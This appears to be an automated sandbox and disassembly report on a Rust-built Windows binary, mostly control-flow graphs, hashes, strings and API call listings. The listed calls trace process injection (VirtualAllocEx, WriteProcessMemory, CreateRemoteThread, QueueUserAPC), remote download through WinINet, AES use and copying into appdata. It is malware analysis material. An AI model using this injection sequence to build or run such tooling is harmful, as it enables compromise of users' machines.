b9cd5d 35968->35979 36244 b7fbf0 44 API calls 35968->36244 35969->35968 35970 b9cf6f GetLastError 35969->35970 35970->35979 35971->35968 35972 b9d020 35971->35972 36245 b6a560 44 API calls 35972->36245 35974 b9d03a 35973->35974 35975 b9cefc 35973->35975 36246 b6a0a0 44 API calls 35974->36246 35978 b7e7a0 45 API calls 35975->35978 35978->35979 35979->35778 36000 b6340d 35997->36000 35998 b63435 35999 b6929d 36001 b6a740 44 API calls 35999->36001 36000->35998 36000->35999 36005 b6930b 36000->36005 36007 b9f490 HeapAlloc 36000->36007 36002 b692c7 36001->36002 36003 b692cb 36002->36003 36248 b6b530 44 API calls 36002->36248 36003->35777 36249 b68de0 44 API calls 36005->36249 36009 b6928b 36007->36009 36009->35999 36247 b68dc0 44 API calls 36009->36247 36014 ba214e 36013->36014 36015 ba215d 36014->36015 36250 b68dc0 44 API calls 36014->36250 36015->35426 36019->35426 36020->35415 36022->35706 36023->35713 36024->35718 36025->35736 36026->35741 36027->35734 36028->35737 36029->35740 36030->35744 36031->35746 36032->35765 36033->35785 36034->35796 36036->35674 36037->35768 36068 b73d37 36066->36068 36067 b73d92 36067->35844 36068->36067 36075 b68e20 44 API calls 36068->36075 36070 b73dbf 36070->35844 36071->35851 36072->35849 36073->35840 36075->36070 36076->35855 36077->35863 36082->35894 36084 b7c560 44 API calls 36083->36084 36086 b7c122 36084->36086 36085 b7c141 36090 b7c147 36085->36090 36107 b6b530 44 API calls 36085->36107 36086->36085 36087 b7c14c 36086->36087 36089 b7c630 44 API calls 36086->36089 36087->35903 36091 b7c134 36089->36091 36090->36087 36108 b6b6f0 44 API calls 36090->36108 36091->36085 36091->36090 36106 b7c700 44 API calls 36091->36106 36097 b6a88a 36095->36097 36098 b6a789 36095->36098 36096 b6a90f 36096->35912 36096->35913 36097->36096 36097->36098 36109 b9efd0 36097->36109 36098->36096 36100 b9efd0 44 API calls 36098->36100 36100->36096 36102->35902 36103->35909 36106->36085 36107->36090 36112 b9ec40 36109->36112 36111 b9efea 36111->36097 36113 b9eeed 36112->36113 36114 b9ec60 36112->36114 36174 b6ad10 44 API calls 36113->36174 36116 b9eef9 36114->36116 36120 b9ec9f 36114->36120 36175 b69690 44 API calls 36116->36175 36119 b9ecc4 36121 b9ecd0 36119->36121 36122 b9edd2 36119->36122 36120->36119 36127 b9ef0a 36120->36127 36128 b9ed94 36120->36128 36125 b9ee09 36121->36125 36126 b9ecdd 36121->36126 36171 b69650 44 API calls 36122->36171 36144 b9e930 36125->36144 36131 b9ee6c 36126->36131 36132 b9ecec memcpy 36126->36132 36176 b6a0a0 44 API calls 36127->36176 36128->36119 36136 b9ee44 36128->36136 36172 b9ef30 44 API calls 36131->36172 36134 b9ee7a 36132->36134 36137 b9ee3f 36134->36137 36153 b7c2e0 36134->36153 36142 b7c2e0 42 API calls 36136->36142 36143 b9ee18 36136->36143 36137->36111 36139 b9eeca 36173 b9ef30 44 API calls 36139->36173 36140 b9ee9f memcpy 36140->36137 36142->36143 36143->36137 36143->36139 36143->36140 36146 b9e9ae 36144->36146 36150 b9e94e 36144->36150 36146->36143 36147 b9ea5d 36229 b69690 44 API calls 36147->36229 36150->36146 36150->36147 36177 b7b6f0 36150->36177 36154 b7c45b 36153->36154 36156 b7c302 36153->36156 36154->36143 36155 b7b6f0 43 API calls 36155->36156 36156->36155 36157 b7c45f 36156->36157 36160 b7c437 36156->36160 36157->36154 36158 b7c477 36157->36158 36159 b7c4ae 36157->36159 36158->36154 36161 b7c481 memcpy 36158->36161 36231 b6a0a0 44 API calls 36159->36231 36160->36154 36230 b6a0a0 44 API calls 36160->36230 36161->36154 36172->36134 36173->36137 36174->36116 36178 b7b70a 36177->36178 36194 b7b741 36177->36194 36179 b7b72b GetLastError 36178->36179 36180 b7b75f 36178->36180 36178->36194 36179->36194 36181 b7b783 36180->36181 36185 b7b7cf 36180->36185 36187 b7b841 36180->36187 36182 b7b960 36181->36182 36183 b7b78c 36181->36183 36184 b69650 37 API calls 36182->36184 36189 b7b8d7 36183->36189 36183->36194 36195 b7b9cc 36183->36195 36186 b7b992 36184->36186 36185->36186 36200 b7b832 36185->36200 36188 b7b230 37 API calls 36186->36188 36190 b7b87a 36187->36190 36191 b7b9f9 36187->36191 36187->36194 36187->36200 36188->36195 36189->36194 36198 b7b902 36189->36198 36199 b7ba3e 36189->36199 36197 b7ba0e 36190->36197 36190->36200 36196 b6a0a0 37 API calls 36191->36196 36192 b6a0a0 37 API calls 36192->36191 36193 b7baa0 37 API calls 36193->36194 36194->36150 36195->36192 36196->36197 36201 b6b530 37 API calls 36197->36201 36202 b7baa0 37 API calls 36198->36202 36203 b7bd10 37 API calls 36199->36203 36200->36193 36200->36194 36201->36199 36204 b7b90d 36202->36204 36203->36204 36204->36194 36205 b7bd10 37 API calls 36204->36205 36206 b7ba7e CloseHandle 36205->36206 36207 ba28b0 6 API calls 36206->36207 36218 b7ba91 36207->36218 36208 b7bb16 MultiByteToWideChar 36209 b7bb41 36208->36209 36210 b7bc79 36208->36210 36211 b7bb4f WriteConsoleW 36209->36211 36212 b7bcba 36209->36212 36213 b69650 37 API calls 36210->36213 36214 b7bb80 36211->36214 36215 b7bc4e GetLastError 36211->36215 36216 b6a0a0 37 API calls 36212->36216 36213->36212 36220 b7bb95 36214->36220 36221 b7bce8 36214->36221 36226 b7bbf1 36214->36226 36215->36226 36217 b7bcce 36216->36217 36219 b6c3a0 37 API calls 36217->36219 36218->36208 36218->36217 36219->36221 36223 b7bba9 WriteConsoleW 36220->36223 36224 b7bbe8 36220->36224 36222 b69700 37 API calls 36221->36222 36222->36224 36223->36224 36225 b7bbe3 GetLastError 36223->36225 36224->36226 36227 b6a0a0 37 API calls 36224->36227 36225->36224 36226->36150 36228 b7bd0c 36227->36228 36232->35928 36236 b7a5f0 36235->36236 36237 b7a5ff 36235->36237 36238 b9f490 HeapAlloc 36236->36238 36237->35942 36239 b7a5fd RtlAllocateHeap 36238->36239 36239->36237 36241->35954 36243->35968 36244->35968 36248->36005
                APIs
                  • Part of subcall function 00B71956: TlsGetValue.KERNEL32 ref: 00B71977
                  • Part of subcall function 00B71956: memset.MSVCRT ref: 00B71A3F
                  • Part of subcall function 00B71956: TlsGetValue.KERNEL32 ref: 00B71AB4
                  • Part of subcall function 00B71956: TlsSetValue.KERNEL32 ref: 00B71AC1
                • LoadLibraryA.KERNELBASE ref: 00B64F09
                • LoadLibraryA.KERNELBASE ref: 00B64F3A
                • CreateProcessA.KERNELBASE ref: 00B6523D
                  • Part of subcall function 00B9F130: WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00B9F28F
                • VirtualAllocEx.KERNELBASE ref: 00B65430
                • WriteProcessMemory.KERNELBASE ref: 00B654EE
                  • Part of subcall function 00B648C3: strlen.MSVCRT ref: 00B6490A
                • CreateRemoteThread.KERNELBASE ref: 00B656B8
                • VirtualProtectEx.KERNELBASE ref: 00B658F8
                • WriteProcessMemory.KERNELBASE ref: 00B65929
                • VirtualProtectEx.KERNELBASE ref: 00B65A2F
                • VirtualProtectEx.KERNELBASE ref: 00B65C01
                • WriteProcessMemory.KERNELBASE ref: 00B65C2F
                • VirtualProtectEx.KERNELBASE ref: 00B65D30
                • memset.MSVCRT ref: 00B65E42
                • InternetOpenA.WININET ref: 00B65E9B
                • InternetOpenUrlA.WININET ref: 00B65EF2
                • InternetReadFile.WININET ref: 00B65F23
                  • Part of subcall function 00B63444: memcpy.MSVCRT ref: 00B63472
                • memset.MSVCRT ref: 00B66962
                • memcpy.MSVCRT ref: 00B66A25
                • memcpy.MSVCRT ref: 00B66A64
                • memcpy.MSVCRT ref: 00B66B2A
                • memcpy.MSVCRT ref: 00B66E2B
                • memcpy.MSVCRT ref: 00B66E6A
                • memcpy.MSVCRT ref: 00B66F30
                • memset.MSVCRT ref: 00B66FC8
                • VirtualAllocEx.KERNELBASE ref: 00B67142
                • WriteProcessMemory.KERNELBASE ref: 00B671A6
                • QueueUserAPC.KERNELBASE ref: 00B671C2
                • ResumeThread.KERNELBASE ref: 00B671E1
                • SetLastError.KERNEL32 ref: 00B6733E
                • GetModuleFileNameW.KERNEL32 ref: 00B6734B
                • GetLastError.KERNEL32 ref: 00B67356
                • GetLastError.KERNEL32 ref: 00B6736B
                • CopyFileExW.KERNEL32 ref: 00B67D37
                • GetLastError.KERNEL32 ref: 00B68111
                • GetLastError.KERNEL32 ref: 00B68627
                Strings
                • appdata, xrefs: 00B67443
                • AES-NI not supported on this architecture. If you are using the MSVC toolchain, this is because the AES-NI method's have not been ported, yet/mnt/c/Users/admin/.cargo/registry/src/index.crates.io-6f17d22bba15001f/rust-crypto-0.2.36/src/aesni.rs, xrefs: 00B68596
                • Invalid AES key size., xrefs: 00B685F9
                • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789, xrefs: 00B64B00
                • HANDLE:\, xrefs: 00B6874A
                • [86!6f3', xrefs: 00B6551A
                • @, xrefs: 00B6712F
                • called `Result::unwrap()` on an `Err` value, xrefs: 00B680B1, 00B68155, 00B683B2, 00B683E7, 00B68571, 00B685BA
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: memcpy$Virtual$ErrorLastProcess$MemoryProtectWritememset$FileInternetValue$AllocCreateLibraryLoadOpenThread$AddressCopyModuleNameQueueReadRemoteResumeSingleUserWakestrlen
                • String ID: @$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789$AES-NI not supported on this architecture. If you are using the MSVC toolchain, this is because the AES-NI method's have not been ported, yet/mnt/c/Users/admin/.cargo/registry/src/index.crates.io-6f17d22bba15001f/rust-crypto-0.2.36/src/aesni.rs$HANDLE:\$Invalid AES key size.$[86!6f3'$appdata$called `Result::unwrap()` on an `Err` value
                • API String ID: 386811839-3323831040
                • Opcode ID: 4126b98aba36b8b9fa54c14cb13db2673f70dea28bf59e77754588329b96678a
                • Instruction ID: 0f0742c417adfc74bab1d4cee10c0e0d9a2989cd24d3d071d96336606da27931
                • Opcode Fuzzy Hash: 4126b98aba36b8b9fa54c14cb13db2673f70dea28bf59e77754588329b96678a
                • Instruction Fuzzy Hash: 54639972318BC181EB20DB25E4547AAB3A4F789B84F848666DECD07B59DF7DC646CB00

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 915 b7b6f0-b7b708 916 b7b741-b7b745 915->916 917 b7b70a-b7b723 call ba23f4 915->917 919 b7b751-b7b75e 916->919 921 b7b747 917->921 922 b7b725-b7b729 917->922 921->919 923 b7b75f-b7b774 call ba2464 922->923 924 b7b72b-b7b73f GetLastError 922->924 927 b7b776-b7b77d 923->927 928 b7b7cf-b7b815 call ba24d4 923->928 924->919 929 b7b783-b7b786 927->929 930 b7b841-b7b862 call b6ae30 927->930 940 b7b817-b7b82c call ba234c 928->940 941 b7b832-b7b834 928->941 933 b7b960-b7b98d call b69650 929->933 934 b7b78c-b7b79a 929->934 943 b7b8b6-b7b8ba 930->943 944 b7b864-b7b86b 930->944 942 b7b992-b7b9e0 call b7b230 call b7b340 933->942 938 b7b7a0-b7b7c0 934->938 939 b7b89a-b7b8a5 934->939 945 b7b7c6-b7b7cd 938->945 946 b7b8cb-b7b8d1 938->946 939->919 940->941 940->942 948 b7b836-b7b83c 941->948 949 b7b8aa-b7b8b1 call ba24cc 941->949 952 b7b9e2-b7b9f4 call b6a0a0 942->952 957 b7b8be-b7b8c1 call b7baa0 943->957 953 b7b931-b7b942 944->953 954 b7b871-b7b874 944->954 945->919 951 b7b8d7-b7b8eb call b6ae30 946->951 946->952 948->919 949->943 965 b7b94f-b7b95b 951->965 973 b7b8ed-b7b8fc 951->973 961 b7b9f9-b7ba09 call b6a0a0 952->961 964 b7b944-b7b946 953->964 953->965 960 b7b87a-b7b88a call b6ae30 954->960 954->961 967 b7b8c6 957->967 975 b7ba0e-b7ba39 call b6b530 960->975 978 b7b890-b7b898 960->978 961->975 964->965 965->919 967->919 976 b7b902-b7b910 call b7baa0 973->976 977 b7ba3e-b7ba59 call b7bd10 973->977 975->977 976->919 984 b7b916-b7b921 976->984 983 b7ba5e-b7baa6 call b7bd10 CloseHandle call ba28b0 977->983 978->957 990 b7bab0-b7bacb 983->990 991 b7baab call ba2300 983->991 984->983 987 b7b927-b7b92c 984->987 987->919 992 b7bb16-b7bb3b MultiByteToWideChar 990->992 993 b7bacd-b7bad2 990->993 991->990 995 b7bb41-b7bb49 992->995 996 b7bc79-b7bcb5 call b69650 992->996 994 b7bae0-b7baeb 993->994 994->994 997 b7baed-b7bafe 994->997 998 b7bb4f-b7bb7a WriteConsoleW 995->998 999 b7bcba-b7bcc9 call b6a0a0 995->999 996->999 1001 b7bb10 997->1001 1002 b7bb00-b7bb05 997->1002 1003 b7bb80-b7bb89 998->1003 1004 b7bc4e-b7bc62 GetLastError 998->1004 1006 b7bcce-b7bce3 call b6c3a0 999->1006 1001->992 1001->1006 1002->1006 1007 b7bb0b-b7bb0e 1002->1007 1009 b7bc66 1003->1009 1010 b7bb8f 1003->1010 1008 b7bc68-b7bc78 1004->1008 1013 b7bce8-b7bcf5 call b69700 1006->1013 1007->992 1009->1008 1012 b7bb95-b7bba7 1010->1012 1010->1013 1015 b7bba9-b7bbe1 WriteConsoleW 1012->1015 1016 b7bbe8-b7bbeb 1012->1016 1019 b7bcfa-b7bd0d call b6a0a0 1013->1019 1015->1016 1017 b7bbe3 GetLastError 1015->1017 1018 b7bbf1-b7bbf4 1016->1018 1016->1019 1017->1016 1020 b7bbf6-b7bbfd 1018->1020 1021 b7bc64 1018->1021 1023 b7bc0c-b7bc1c 1020->1023 1021->1009 1025 b7bc00-b7bc0a 1023->1025 1026 b7bc1e-b7bc2e 1023->1026 1025->1009 1025->1023 1026->1025 1027 b7bc30-b7bc4c 1026->1027 1027->1025
                APIs
                • GetLastError.KERNEL32 ref: 00B7B72B
                • CloseHandle.KERNEL32 ref: 00B7BA84
                  • Part of subcall function 00BA28B0: RtlCaptureContext.KERNEL32 ref: 00BA2935
                  • Part of subcall function 00BA28B0: RtlUnwindEx.KERNEL32 ref: 00BA2953
                  • Part of subcall function 00BA28B0: abort.MSVCRT ref: 00BA2959
                  • Part of subcall function 00BA28B0: abort.MSVCRT ref: 00BA2970
                • MultiByteToWideChar.KERNEL32 ref: 00B7BB34
                • WriteConsoleW.KERNEL32 ref: 00B7BB73
                • WriteConsoleW.KERNEL32 ref: 00B7BBDA
                • GetLastError.KERNEL32 ref: 00B7BBE3
                • GetLastError.KERNEL32 ref: 00B7BC4E
                Strings
                • called `Result::unwrap()` on an `Err` value, xrefs: 00B7BA22
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: ErrorLast$ConsoleWriteabort$ByteCaptureCharCloseContextHandleMultiUnwindWide
                • String ID: called `Result::unwrap()` on an `Err` value
                • API String ID: 3690811170-2333694755
                • Opcode ID: ccbafbfebb141457d75c273a2f1394f1fa269c0b7fbe138dbad1fa2a2cdd045a
                • Instruction ID: 20211072f9908c079f25bcc5323f2625c62d0478139162dce5d81f7b9354dd4e
                • Opcode Fuzzy Hash: ccbafbfebb141457d75c273a2f1394f1fa269c0b7fbe138dbad1fa2a2cdd045a
                • Instruction Fuzzy Hash: 06E11E627046908AEB259F34D840BED37A1F745398F90C262EEAD57B99EF7CC685C700

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1028 b61180-b611ae 1029 b611b4-b611d1 1028->1029 1030 b61460-b61463 GetStartupInfoA 1028->1030 1031 b611e9-b611f4 1029->1031 1032 b61470-b6148a call ba2be0 1030->1032 1033 b611f6-b61204 1031->1033 1034 b611d8-b611db 1031->1034 1038 b61417-b61426 call ba2be8 1033->1038 1039 b6120a-b6120e 1033->1039 1036 b61400-b61411 1034->1036 1037 b611e1-b611e6 Sleep 1034->1037 1036->1038 1036->1039 1037->1031 1046 b6142c-b61447 _initterm 1038->1046 1047 b61229-b6122b 1038->1047 1042 b61214-b61223 1039->1042 1043 b61490-b614a9 call ba2bd8 1039->1043 1042->1046 1042->1047 1054 b614ae-b614b0 call ba2bc0 1043->1054 1049 b61231-b6123e 1046->1049 1050 b6144d-b61452 1046->1050 1047->1049 1047->1050 1051 b61240-b61248 1049->1051 1052 b6124c-b61299 call ba3370 SetUnhandledExceptionFilter call ba3880 call ba2c10 call ba30e0 call ba2c20 1049->1052 1050->1049 1051->1052 1070 b612b2-b612b8 1052->1070 1071 b6129b 1052->1071 1058 b614b5-b614e1 call ba2d30 call b61180 1054->1058 1072 b612a0-b612a2 1070->1072 1073 b612ba-b612c8 1070->1073 1074 b612f0-b612f6 1071->1074 1078 b612a4-b612a7 1072->1078 1079 b612e9 1072->1079 1075 b612ae 1073->1075 1076 b6130e-b61333 malloc 1074->1076 1077 b612f8-b61302 1074->1077 1075->1070 1084 b61335-b6133a 1076->1084 1085 b6137b-b613af call ba2cf0 call b68820 1076->1085 1082 b613f0-b613f5 1077->1082 1083 b61308 1077->1083 1080 b612d0-b612d2 1078->1080 1081 b612a9 1078->1081 1079->1074 1080->1079 1087 b612d4 1080->1087 1081->1075 1082->1083 1083->1076 1088 b61340-b61374 strlen malloc memcpy 1084->1088 1094 b613b4-b613c2 1085->1094 1090 b612d8-b612e2 1087->1090 1088->1088 1091 b61376 1088->1091 1090->1079 1093 b612e4-b612e7 1090->1093 1091->1085 1093->1079 1093->1090 1094->1054 1095 b613c8-b613d0 1094->1095 1095->1032 1096 b613d6-b613e5 1095->1096
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
                • String ID:
                • API String ID: 649803965-0
                • Opcode ID: 56d3077b24a10557b69448890dda5a8fca88be95f18b9fc4ab5efc74502c2d62
                • Instruction ID: ce263e6498007dbb1c0690b0e48d53fc539dfcefa33e66462bd4a495b6026f88
                • Opcode Fuzzy Hash: 56d3077b24a10557b69448890dda5a8fca88be95f18b9fc4ab5efc74502c2d62
                • Instruction Fuzzy Hash: 3281CC3270574886EB20AF5EE8A176D33E5F746B80F8888A6DE0987715DF7DC844C710

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1216 b68820-b6889c call ba2cf0 call ba24bc call ba237c call ba244c SetThreadDescription call b7afc0 call b7c630 1229 b688a2-b688a6 1216->1229 1230 b68933-b68937 1216->1230 1233 b6896c-b689be call b7b230 call b7b340 1229->1233 1234 b688ac-b688cb call b7c560 1229->1234 1231 b68942-b6896a call b6b530 1230->1231 1232 b68939-b6893d call b7ad40 1230->1232 1242 b689d8-b689e3 call b7b080 1231->1242 1232->1231 1243 b689c0-b689d3 call b6b6f0 1233->1243 1234->1243 1244 b688d1-b688d6 1234->1244 1254 b68a07-b68a0d call b7b080 1242->1254 1255 b689e5-b689f7 call b7ad40 call b7b080 1242->1255 1243->1242 1248 b688df-b688e6 call b627fb 1244->1248 1249 b688d8-b688dc 1244->1249 1253 b688eb-b688f4 1248->1253 1249->1248 1256 b688f6-b68922 call b7b090 1253->1256 1257 b68927-b68932 1253->1257 1255->1254 1265 b689f9-b68a02 call b7ad40 call b7b080 1255->1265 1256->1257 1265->1254
                APIs
                • SetThreadDescription.KERNELBASE ref: 00B6886A
                  • Part of subcall function 00B7C630: TlsGetValue.KERNEL32 ref: 00B7C64F
                  • Part of subcall function 00B7C630: TlsGetValue.KERNEL32 ref: 00B7C683
                  • Part of subcall function 00B7C630: TlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,00B7C741), ref: 00B7C693
                  • Part of subcall function 00B7C560: TlsGetValue.KERNEL32 ref: 00B7C582
                  • Part of subcall function 00B7C560: TlsGetValue.KERNEL32 ref: 00B7C5D2
                  • Part of subcall function 00B7C560: TlsSetValue.KERNEL32(?,?,00000000,?,00B7C741), ref: 00B7C5E2
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: Value$DescriptionThread
                • String ID: main
                • API String ID: 1014837369-3207122276
                • Opcode ID: c1d8d602db548a8f4d35c744c6b2dddfc4c48d2672d91014ae1290c153ee3b8f
                • Instruction ID: e7436b89970694e2d8f7d60cf510d98655bb3af1a8cd7c627e537c6ebde54dc3
                • Opcode Fuzzy Hash: c1d8d602db548a8f4d35c744c6b2dddfc4c48d2672d91014ae1290c153ee3b8f
                • Instruction Fuzzy Hash: C1514832611B5499EB10EFA0E8913ED33B4FB45308F90856AEA5D67B95EF38C94AC341

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1097 b7baa0-b7bacb call ba2300 1100 b7bb16-b7bb3b MultiByteToWideChar 1097->1100 1101 b7bacd-b7bad2 1097->1101 1103 b7bb41-b7bb49 1100->1103 1104 b7bc79-b7bcb5 call b69650 1100->1104 1102 b7bae0-b7baeb 1101->1102 1102->1102 1105 b7baed-b7bafe 1102->1105 1106 b7bb4f-b7bb7a WriteConsoleW 1103->1106 1107 b7bcba-b7bcc9 call b6a0a0 1103->1107 1104->1107 1109 b7bb10 1105->1109 1110 b7bb00-b7bb05 1105->1110 1111 b7bb80-b7bb89 1106->1111 1112 b7bc4e-b7bc62 GetLastError 1106->1112 1114 b7bcce-b7bce3 call b6c3a0 1107->1114 1109->1100 1109->1114 1110->1114 1115 b7bb0b-b7bb0e 1110->1115 1117 b7bc66 1111->1117 1118 b7bb8f 1111->1118 1116 b7bc68-b7bc78 1112->1116 1121 b7bce8-b7bcf5 call b69700 1114->1121 1115->1100 1117->1116 1120 b7bb95-b7bba7 1118->1120 1118->1121 1123 b7bba9-b7bbe1 WriteConsoleW 1120->1123 1124 b7bbe8-b7bbeb 1120->1124 1127 b7bcfa-b7bd0d call b6a0a0 1121->1127 1123->1124 1125 b7bbe3 GetLastError 1123->1125 1126 b7bbf1-b7bbf4 1124->1126 1124->1127 1125->1124 1128 b7bbf6-b7bbfd 1126->1128 1129 b7bc64 1126->1129 1131 b7bc0c-b7bc1c 1128->1131 1129->1117 1133 b7bc00-b7bc0a 1131->1133 1134 b7bc1e-b7bc2e 1131->1134 1133->1117 1133->1131 1134->1133 1135 b7bc30-b7bc4c 1134->1135 1135->1133
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: ConsoleErrorLastWrite$ByteCharMultiWide
                • String ID:
                • API String ID: 1956605914-0
                • Opcode ID: 84192aeb223bf039493d913838b751b5b078c80bf8458050e23cca5f8a524f14
                • Instruction ID: 2d220b4799008c1000a64f405b0f1a090ba1f4331ad8153406ddac2c6c6b8f47
                • Opcode Fuzzy Hash: 84192aeb223bf039493d913838b751b5b078c80bf8458050e23cca5f8a524f14
                • Instruction Fuzzy Hash: B83104726045A44AEB254B35D844BEE66D1F7053E4F04C2B1EEAE8BBD8EF78C5418B00

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1136 b9f130-b9f166 1137 b9f2a9-b9f2ae call b9eaa0 1136->1137 1138 b9f16c-b9f17e call b7c110 1136->1138 1145 b9f2b3-b9f2bf call b7fc90 1137->1145 1143 b9f180-b9f189 1138->1143 1144 b9f193-b9f19f 1138->1144 1147 b9f18f-b9f191 1143->1147 1148 b9f323-b9f343 call b6b6f0 1143->1148 1144->1145 1146 b9f1a5-b9f1ac 1144->1146 1162 b9f2c4-b9f31c call b69650 1145->1162 1149 b9f1b1-b9f1ed call b6a740 1146->1149 1147->1149 1156 b9f351-b9f39b call b68a20 call b7c1d0 call ba28b0 call b6b900 1148->1156 1157 b9f345-b9f34c call b68a20 1148->1157 1158 b9f22b-b9f234 1149->1158 1159 b9f1ef-b9f1f2 1149->1159 1157->1156 1166 b9f26f 1158->1166 1167 b9f236-b9f248 1158->1167 1164 b9f272-b9f279 1159->1164 1165 b9f1f4-b9f226 call b69650 1159->1165 1169 b9f321 1162->1169 1170 b9f27b-b9f289 1164->1170 1171 b9f294-b9f297 1164->1171 1165->1169 1166->1164 1173 b9f24a 1167->1173 1174 b9f24f-b9f254 1167->1174 1169->1148 1170->1171 1176 b9f28b-b9f28f WakeByAddressSingle 1170->1176 1171->1162 1177 b9f299-b9f2a8 1171->1177 1173->1174 1180 b9f262-b9f26a call b68a20 1174->1180 1181 b9f256-b9f25d call b68a20 1174->1181 1176->1171 1180->1166 1181->1180
                APIs
                • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00B9F28F
                Strings
                • lock count overflow in reentrant mutexlibrary\std\src\sync\reentrant_lock.rs, xrefs: 00B9F323
                • stdoutlibrary\std\src\io\mod.rsfailed to write whole buffer, xrefs: 00B9F14A
                Memory Dump Source
                • Source File: 00000003.00000002.1863979994.0000000000B61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B60000, based on PE: true
                • Associated: 00000003.00000002.1863962555.0000000000B60000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BA6000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864033704.0000000000BB3000.00000002.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864076924.0000000000BBA000.00000004.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864095889.0000000000BBB000.00000008.00000001.01000000.00000007.sdmpDownload File
                • Associated: 00000003.00000002.1864117984.0000000000BBE000.00000002.00000001.01000000.00000007.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_b60000_FRpl.jbxd
                Similarity
                • API ID: AddressSingleWake
